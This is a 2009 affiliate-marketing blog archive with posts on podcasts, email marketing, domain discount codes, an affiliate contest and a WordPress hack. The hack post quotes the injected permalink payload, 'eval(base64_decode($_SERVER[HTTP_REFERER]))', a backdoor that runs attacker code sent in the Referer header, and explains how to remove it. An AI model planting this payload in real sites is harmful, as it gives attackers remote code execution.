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Friday Podcast: Online Classifieds and iPhone Application Development with Brad Waller September 12, 2009

Posted by Andrew Wee in : podcasts , 3 comments

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Veteran internet marketer Brad Waller comes from an interesting background – with a degree in physics from MIT and 13 years in the aerospace industry, it doesn’t sound like the usual programmer/marketeter who wanders into internet marketer.

Together with his partners, Brad is one of the earliest marketers in the online classified space since 1993 and launched one of the earliest affiliate programs.

I invited Brad on the Friday Podcast to hear his thoughts on:

Check out the podcast below:

 
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Released iPhone apps (you can find them on the iPhone app store):

In process apps:

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Affiliate Marketing Tips #9: Email Profits September 10, 2009

Posted by Andrew Wee in : affiliate marketing , 5 comments

Up to this point, most new affiliate marketers will likely go the PPC (pay per click) or blogging route when starting up your campaigns, what will give your marketing efforts a boost is a pretty simple technique, but one in which many marketer screw up. Here’s some tips to emailing.

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This is a continuing series of “Affiliate Marketing Tips” posts to share marketing and promotion strategies for affiliate marketers. If you’re new to the series, you might like to check out the first in the series “The Industry and Getting Accepted

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Unless you’re a weird technophobe, you will have an email account, likely at least 5 or 10 of them. So the concept of mass mailing prospect (people who land on your landing page/sales page) in the hopes of converting them into leads or customers will seem pretty intuitive – just send them the offer, then keep sending them the offer every 1-2 days until they opt-in, pass on, or report your email as spam and send you to the Spamhaus blacklist directory.

If you’re already getting very decent ROI from your PPC campaigns, you might wondering why you want to mess around with emailing, especially since it might “lower conversion rates” because of the additional hoop of jumping through an opt-in process.

First off, not every affiliate or CPA campaign will benefit from incorporating an opt-in into the process – you need to look at the campaign and see if it makes sense. Primarily because most of the email/zip submit CPA offers are already opt-in offers themselves (before the lead gets hit with 10-20 pay-per-sale/rebill offers).

Instead of being only offer-focused, think of the (more…)

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Namecheap Discount Code September 2009 September 8, 2009

Posted by Andrew Wee in : domain names , 4 comments

In case you missed them, these are the Namecheap discount codes which work now:

If you have more than 50 domains in your account, the code that always works for me: GOLDDEAL

I haven’t used their web hosting as I like to keep my domains and hosting separate, but if you’re interested in their hosting packages, here are some codes:

As you’re probably aware, Namecheap is my preferred domain registrar.

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Market Leverage Launches $3,000 Affiliate Contest For Travel CPA Offer

Posted by Andrew Wee in : affiliate marketing , 4 comments

New this month, affiliate network Market Leverage, has launched an  affiliate promotion for its exclusive travel CPA offer.

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The Park Royal Cancun travel offer requires the lead’s name and email address to be filled in, which is pretty standard for this type of offer.

To kick off this exclusive offer, Market Leverage is giving away 2 cash bounties to it’s affiliates:

Winners are determined by the most leads generated to the travel offer within their tier.

The offer has a payout of $1.65 per lead.

Contest details:

Check out: Market Leverage

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Friday Podcast: A Strategy For Business Success With Amit Mehta September 4, 2009

Posted by Andrew Wee in : podcasts , 5 comments

amit mehtaI invited top affiliate Amit Mehta on to talk about some of the experiences of affiliate marketers whom he’s coached, addressing the question why many of them aren’t more successful than they already are.

Some of the topics we discussed:

Check out the podcast below:

 
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URGENT: If Your Wordpress Blog is Acting Strangely, Follow These Steps

Posted by Andrew Wee in : blogging , 18 comments

I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929

If you notice something similar or weird with your Wordpress blog, you might want to take the following steps:

Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.

If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929″, you’d want to clear that, and replace it with your original permalink structure, or look it up on the Wordpress codex.

You can also check out this other blog post for more details.

Note: this issue seems to be affecting Wordpress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.

UPDATE: Matt Mullenweg from the Wordpress development team has posted about the security issues if you’re using an older version of Wordpress. Here’s a WP support forum write up about what might be happening.

You might want to upgrade to a newer version of Wordpress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.

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